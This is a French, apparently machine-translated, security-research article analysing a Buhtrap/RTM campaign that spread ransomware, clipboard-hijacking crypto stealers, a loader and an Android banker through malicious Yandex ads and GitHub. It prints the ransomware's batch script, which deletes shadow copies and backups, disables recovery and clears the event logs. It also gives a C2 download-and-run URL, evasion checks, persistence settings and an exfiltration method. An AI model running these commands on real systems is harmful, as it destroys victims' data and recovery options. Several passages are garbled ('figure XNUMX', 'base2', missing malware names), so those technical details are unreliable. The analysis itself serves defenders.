Pour cibler les comptables lors d’une cyberattaque, vous pouvez utiliser les documents de travail qu’ils recherchent en ligne. C’est à peu près ce que fait depuis quelques mois un groupe cyber en distribuant des portes dérobées connues. и , ainsi que des chiffreurs et des logiciels permettant de voler des crypto-monnaies. La plupart des cibles sont situées en Russie. L'attaque a été menée en plaçant des publicités malveillantes sur Yandex.Direct. Les victimes potentielles ont été dirigées vers un site Web où il leur a été demandé de télécharger un fichier malveillant déguisé en modèle de document. Yandex a supprimé la publicité malveillante après notre avertissement.
Le code source de Buhtrap a déjà été divulgué en ligne afin que tout le monde puisse l'utiliser. Nous n’avons aucune information concernant la disponibilité du code RTM.
Dans cet article, nous vous expliquerons comment les attaquants ont distribué des logiciels malveillants à l'aide de Yandex.Direct et les ont hébergés sur GitHub. L'article se terminera par une analyse technique du malware.
Buhtrap et RTM reprennent leurs activités
Mécanisme de propagation et victimes
Les différentes charges utiles livrées aux victimes partagent un mécanisme de propagation commun. Tous les fichiers malveillants créés par les attaquants ont été placés dans deux référentiels GitHub différents.
En règle générale, le référentiel contenait un fichier malveillant téléchargeable, qui changeait fréquemment. Puisque GitHub vous permet d'afficher l'historique des modifications apportées à un référentiel, nous pouvons voir quel malware a été distribué pendant une certaine période. Pour convaincre la victime de télécharger le fichier malveillant, le site blanki-shabloni24[.]ru, illustré dans la figure ci-dessus, a été utilisé.
La conception du site et tous les noms des fichiers malveillants suivent un concept unique : formulaires, modèles, contrats, échantillons, etc. Considérant que les logiciels Buhtrap et RTM ont déjà été utilisés dans des attaques contre des comptables dans le passé, nous avons supposé que le la stratégie dans la nouvelle campagne est la même. La seule question est de savoir comment la victime est parvenue sur le site des attaquants.
Infection
Au moins plusieurs victimes potentielles qui se sont retrouvées sur ce site ont été attirées par des publicités malveillantes. Vous trouverez ci-dessous un exemple d'URL :
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Comme vous pouvez le voir sur le lien, la bannière a été publiée sur le forum comptable légitime bb.f2[.]kz. Il est important de noter que les bannières apparaissaient sur des sites différents, avaient toutes le même identifiant de campagne (blanki_rsya) et étaient pour la plupart liées aux services de comptabilité ou d'assistance juridique. L’URL montre que la victime potentielle a utilisé la requête « télécharger le formulaire de facture », ce qui conforte notre hypothèse d’attaques ciblées. Vous trouverez ci-dessous les sites sur lesquels les bannières sont apparues et les requêtes de recherche correspondantes.
- télécharger le formulaire de facture – bb.f2[.]kz
- exemple de contrat - Ipopen[.]ru
- exemple de plainte de candidature - 77metrov[.]ru
- formulaire d'accord - blank-dogovor-kupli-prodazhi[.]ru
- exemple de requête au tribunal - zen.yandex[.]ru
- exemple de plainte - yurday[.]ru
- exemples de formulaires de contrat – Regforum[.]ru
- formulaire de contrat – assistentus[.]ru
- exemple de contrat d'appartement – napravah[.]com
- exemples de contrats juridiques - avito[.]ru
Le site blanki-shabloni24[.]ru a peut-être été configuré pour réussir une simple évaluation visuelle. En règle générale, une annonce qui pointe vers un site d'aspect professionnel avec un lien vers GitHub ne semble pas être quelque chose de manifestement mauvais. De plus, les attaquants n’ont téléchargé des fichiers malveillants dans le référentiel que pendant une période limitée, probablement pendant la campagne. La plupart du temps, le référentiel GitHub contenait une archive zip vide ou un fichier EXE vierge. Ainsi, les attaquants pourraient diffuser de la publicité via Yandex.Direct sur des sites très probablement visités par des comptables venus en réponse à des requêtes de recherche spécifiques.
Examinons ensuite les différentes charges utiles ainsi réparties.
Analyse de la charge utile
Chronologie de distribution
La campagne malveillante a débuté fin octobre 2018 et est active au moment de la rédaction de cet article. L’intégralité du référentiel étant accessible au public sur GitHub, nous avons compilé une chronologie précise de la distribution de six familles de logiciels malveillants différentes (voir la figure ci-dessous). Nous avons ajouté une ligne indiquant quand le lien de la bannière a été découvert, tel que mesuré par la télémétrie ESET, à des fins de comparaison avec l'historique git. Comme vous pouvez le constater, cela correspond bien à la disponibilité de la charge utile sur GitHub. L'écart de fin février peut s'expliquer par le fait que nous n'avions pas une partie de l'historique des modifications car le dépôt a été supprimé de GitHub avant que nous puissions l'obtenir dans son intégralité.
Figure 1. Chronologie de la distribution des logiciels malveillants.
Certificats de signature de code
La campagne a utilisé plusieurs certificats. Certains ont été signés par plusieurs familles de logiciels malveillants, ce qui indique en outre que différents échantillons appartenaient à la même campagne. Malgré la disponibilité de la clé privée, les opérateurs ne signaient pas systématiquement les binaires et n'utilisaient pas la clé pour tous les échantillons. Fin février 2019, des attaquants ont commencé à créer des signatures invalides à l'aide d'un certificat appartenant à Google pour lequel ils ne disposaient pas de la clé privée.
Tous les certificats impliqués dans la campagne et les familles de malwares qu'ils signent sont répertoriés dans le tableau ci-dessous.
Nous avons également utilisé ces certificats de signature de code pour établir des liens avec d'autres familles de malwares. Pour la plupart des certificats, nous n'avons pas trouvé d'exemples qui n'étaient pas distribués via un référentiel GitHub. Cependant, le certificat TOV « MARIYA » a été utilisé pour signer des logiciels malveillants appartenant au botnet , les logiciels publicitaires et les mineurs. Il est peu probable que ce malware soit lié à cette campagne. Très probablement, le certificat a été acheté sur le darknet.
Win32/Filecoder.Buhtrap
Le premier composant qui a attiré notre attention était le nouveau Win32/Filecoder.Buhtrap. Il s'agit d'un fichier binaire Delphi qui est parfois empaqueté. Il a été principalement distribué en février-mars 2019. Il se comporte comme il sied à un programme ransomware : il recherche les lecteurs locaux et les dossiers réseau et crypte les fichiers détectés. Il n'est pas nécessaire qu'une connexion Internet soit compromise car il ne contacte pas le serveur pour envoyer des clés de cryptage. Au lieu de cela, il ajoute un « jeton » à la fin du message de rançon et suggère d’utiliser un e-mail ou un Bitmessage pour contacter les opérateurs.
Pour chiffrer autant de ressources sensibles que possible, Filecoder.Buhtrap exécute un thread conçu pour arrêter les logiciels clés susceptibles d'avoir des gestionnaires de fichiers ouverts contenant des informations précieuses susceptibles d'interférer avec le chiffrement. Les processus cibles sont principalement des systèmes de gestion de bases de données (SGBD). De plus, Filecoder.Buhtrap supprime les fichiers journaux et les sauvegardes pour rendre difficile la récupération des données. Pour ce faire, exécutez le script batch ci-dessous.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap utilise un service IP Logger en ligne légitime conçu pour collecter des informations sur les visiteurs du site Web. Celui-ci est destiné au traçage des victimes du ransomware, qui relève de la responsabilité de la ligne de commande :
mshta.exe "javascript:document.write('');"
Les fichiers à chiffrer sont sélectionnés s'ils ne correspondent pas à trois listes d'exclusion. Premièrement, les fichiers portant les extensions suivantes ne sont pas cryptés : .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys et .chauve souris. Deuxièmement, tous les fichiers dont le chemin complet contient des chaînes de répertoire de la liste ci-dessous sont exclus.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Troisièmement, certains noms de fichiers sont également exclus du cryptage, parmi lesquels le nom de fichier de la demande de rançon. La liste est présentée ci-dessous. Bien entendu, toutes ces exceptions visent à maintenir la machine en marche, mais avec un contrôle technique minimal.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Schéma de cryptage des fichiers
Une fois exécuté, le malware génère une paire de clés RSA de 512 bits. L'exposant privé (d) et le module (n) sont ensuite chiffrés avec une clé publique de 2048 64 bits codée en dur (exposant public et module), compressée en zlib et codée en base2. Le code responsable de cela est illustré à la figure XNUMX.
Figure 2. Résultat de la décompilation Hex-Rays du processus de génération de paires de clés RSA de 512 bits.
Vous trouverez ci-dessous un exemple de texte brut avec une clé privée générée, qui est un jeton attaché au message de rançon.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
La clé publique des attaquants est indiquée ci-dessous.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Les fichiers sont cryptés à l'aide d'AES-128-CBC avec une clé de 256 bits. Pour chaque fichier chiffré, une nouvelle clé et un nouveau vecteur d'initialisation sont générés. Les informations clés sont ajoutées à la fin du fichier crypté. Considérons le format du fichier crypté.
Les fichiers cryptés ont l'en-tête suivant :
Les données du fichier source avec l'ajout de la valeur magique VEGA sont cryptées jusqu'aux 0x5000 premiers octets. Toutes les informations de décryptage sont jointes à un fichier avec la structure suivante :
- Le marqueur de taille de fichier contient une marque indiquant si la taille du fichier est supérieure à 0x5000 octets.
— Blob de clé AES = ZlibCompress(RSAEncrypt(AES key + IV, clé publique de la paire de clés RSA générée))
- Blob de clé RSA = ZlibCompress(RSAEncrypt(clé privée RSA générée, clé publique RSA codée en dur))
Win32/ClipBanker
Win32/ClipBanker est un composant distribué par intermittence de fin octobre à début décembre 2018. Son rôle est de surveiller le contenu du presse-papiers, il recherche les adresses des portefeuilles de cryptomonnaies. Après avoir déterminé l'adresse du portefeuille cible, ClipBanker la remplace par une adresse censée appartenir aux opérateurs. Les échantillons que nous avons examinés n’étaient ni encadrés ni obscurcis. Le seul mécanisme utilisé pour masquer le comportement est le chiffrement de chaînes. Les adresses des portefeuilles des opérateurs sont cryptées à l'aide de RC4. Les crypto-monnaies cibles sont Bitcoin, Bitcoin cash, Dogecoin, Ethereum et Ripple.
Pendant que le malware se propageait dans les portefeuilles Bitcoin des attaquants, une petite somme a été envoyée à VTS, ce qui jette le doute sur le succès de la campagne. De plus, il n’existe aucune preuve suggérant que ces transactions étaient liées à ClipBanker.
Win32/RTM
Le composant Win32/RTM a été distribué pendant plusieurs jours début mars 2019. RTM est un cheval de Troie bancaire écrit en Delphi, destiné aux systèmes bancaires à distance. En 2017, les chercheurs d'ESET ont publié de ce programme, la description est toujours d'actualité. En janvier 2019, Palo Alto Networks a également publié .
Chargeur Buhtrap
Depuis un certain temps, un téléchargeur était disponible sur GitHub qui n'était pas similaire aux outils Buhtrap précédents. Il se tourne vers https://94.100.18[.]67/RSS.php?<some_id> pour obtenir l'étape suivante et la charge directement en mémoire. On peut distinguer deux comportements du code de deuxième étape. Dans la première URL, RSS.php a directement transmis la porte dérobée Buhtrap - cette porte dérobée est très similaire à celle disponible après la fuite du code source.
Il est intéressant de noter que nous voyons plusieurs campagnes avec la porte dérobée Buhtrap, et elles seraient gérées par différents opérateurs. Dans ce cas, la principale différence est que la porte dérobée est chargée directement en mémoire et n'utilise pas le schéma habituel avec le processus de déploiement de DLL dont nous avons parlé. . De plus, les opérateurs ont modifié la clé RC4 utilisée pour chiffrer le trafic réseau vers le serveur C&C. Dans la plupart des campagnes que nous avons vues, les opérateurs n'ont pas pris la peine de modifier cette clé.
Le deuxième comportement, plus complexe, était que l'URL RSS.php était transmise à un autre chargeur. Il a implémenté certaines obscurcissements, comme la reconstruction de la table d'importation dynamique. Le but du bootloader est de contacter le serveur C&C [.]com/api/F27F84EDA4D13B15/2, envoyez les journaux et attendez une réponse. Il traite la réponse comme un blob, la charge en mémoire et l'exécute. La charge utile que nous avons vue exécuter ce chargeur était la même porte dérobée Buhtrap, mais il peut y avoir d'autres composants.
Android/Spy.Banker
Fait intéressant, un composant pour Android a également été trouvé dans le référentiel GitHub. Il n'est resté dans la succursale principale qu'un jour - le 1er novembre 2018. En plus d'être publiée sur GitHub, la télémétrie ESET ne trouve aucune preuve de la distribution de ce malware.
Le composant était hébergé en tant que package d'application Android (APK). C'est fortement obscurci. Le comportement malveillant est caché dans un JAR crypté situé dans l'APK. Il est chiffré avec RC4 à l'aide de cette clé :
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
La même clé et le même algorithme sont utilisés pour chiffrer les chaînes. JAR est situé dans APK_ROOT + image/files. Les 4 premiers octets du fichier contiennent la longueur du JAR chiffré, qui commence immédiatement après le champ de longueur.
Après avoir déchiffré le fichier, nous avons découvert qu'il s'agissait d'Anubis - auparavant banquier pour Android. Le malware présente les fonctionnalités suivantes :
- enregistrement par microphone
- prendre des captures d'écran
- obtenir les coordonnées GPS
- enregistreur de frappe
- cryptage des données de l'appareil et demande de rançon
- spammer
Il est intéressant de noter que le banquier a utilisé Twitter comme canal de communication de secours pour obtenir un autre serveur C&C. L'échantillon que nous avons analysé utilisait le compte @JonesTrader, mais au moment de l'analyse, il était déjà bloqué.
Le banquier contient une liste d'applications cibles sur l'appareil Android. Elle est plus longue que la liste obtenue dans l’étude Sophos. La liste comprend de nombreuses applications bancaires, des programmes d'achat en ligne tels qu'Amazon et eBay, ainsi que des services de crypto-monnaie.
MSIL/ClipBanker.IH
Le dernier composant distribué dans le cadre de cette campagne était l'exécutable Windows .NET, apparu en mars 2019. La plupart des versions étudiées étaient packagées avec ConfuserEx v1.0.0. Comme ClipBanker, ce composant utilise le presse-papiers. Son objectif est une large gamme de crypto-monnaies, ainsi que des offres sur Steam. De plus, il utilise le service IP Logger pour voler la clé WIF privée Bitcoin.
Mécanismes de protection
Outre les avantages offerts par ConfuserEx pour empêcher le débogage, le dumping et la falsification, le composant inclut la capacité de détecter les produits antivirus et les machines virtuelles.
Pour vérifier qu'il s'exécute sur une machine virtuelle, le malware utilise la ligne de commande Windows WMI (WMIC) intégrée pour demander des informations sur le BIOS, à savoir :
wmic bios
Ensuite, le programme analyse le résultat de la commande et recherche des mots-clés : VBOX, VirtualBox, XEN, qemu, bochs, VM.
Pour détecter les produits antivirus, les logiciels malveillants envoient une requête WMI (Windows Management Instrumentation) au Centre de sécurité Windows à l'aide de ManagementObjectSearcher API comme indiqué ci-dessous. Après décodage depuis base64, l'appel ressemble à ceci :
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Figure 3. Processus d'identification des produits antivirus.
De plus, le malware vérifie si , un outil de protection contre les attaques du presse-papiers et, s'il est en cours d'exécution, suspend tous les threads de ce processus, désactivant ainsi la protection.
Persistance
La version du malware que nous avons étudié se copie dans %APPDATA%googleupdater.exe et définit l'attribut « caché » pour l'annuaire Google. Puis elle change la valeur SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell dans le registre Windows et ajoute le chemin updater.exe. De cette façon, le malware sera exécuté à chaque fois que l’utilisateur se connectera.
Comportement malveillant
Comme ClipBanker, le malware surveille le contenu du presse-papiers et recherche les adresses des portefeuilles de crypto-monnaie et, une fois trouvé, les remplace par l’une des adresses de l’opérateur. Vous trouverez ci-dessous une liste d'adresses cibles basées sur ce qui se trouve dans le code.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Pour chaque type d’adresse correspond une expression régulière. La valeur STEAM_URL est utilisée pour attaquer le système Steam, comme le montre l'expression régulière utilisée pour définir dans le tampon :
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Canal d'exfiltration
En plus de remplacer les adresses dans le tampon, le malware cible les clés privées WIF des portefeuilles Bitcoin, Bitcoin Core et Electrum Bitcoin. Le programme utilise plogger.org comme canal d'exfiltration pour obtenir la clé privée WIF. Pour ce faire, les opérateurs ajoutent des données de clé privée à l'en-tête HTTP User-Agent, comme indiqué ci-dessous.
Figure 4. Console IP Logger avec données de sortie.
Les opérateurs n'ont pas utilisé iplogger.org pour exfiltrer les portefeuilles. Ils ont probablement eu recours à une méthode différente en raison de la limite de 255 caractères dans le champ User-Agentaffiché dans l’interface Web d’IP Logger. Dans les exemples que nous avons étudiés, l'autre serveur de sortie était stocké dans la variable d'environnement DiscordWebHook. Étonnamment, cette variable d'environnement n'est affectée nulle part dans le code. Cela suggère que le malware est encore en développement et que la variable est attribuée à la machine de test de l'opérateur.
Il y a un autre signe que le programme est en cours de développement. Le fichier binaire comprend deux URL iplogger.org, et les deux sont interrogées lorsque les données sont exfiltrées. Dans une requête vers l’une de ces URL, la valeur du champ Referer est précédée de « DEV/ ». Nous avons également trouvé une version qui n'a pas été empaquetée à l'aide de ConfuserEx, le destinataire de cette URL s'appelle DevFeedbackUrl. Sur la base du nom de la variable d'environnement, nous pensons que les opérateurs envisagent d'utiliser le service légitime Discord et son système d'interception Web pour voler des portefeuilles de crypto-monnaie.
Conclusion
Cette campagne est un exemple d'utilisation de services publicitaires légitimes dans le cadre de cyberattaques. Le projet cible des organisations russes, mais nous ne serions pas surpris de voir une telle attaque utiliser des services non russes. Pour éviter toute compromission, les utilisateurs doivent avoir confiance dans la réputation de la source du logiciel qu'ils téléchargent.
Une liste complète des indicateurs de compromission et des attributs MITRE ATT&CK est disponible sur .
Source: habr.com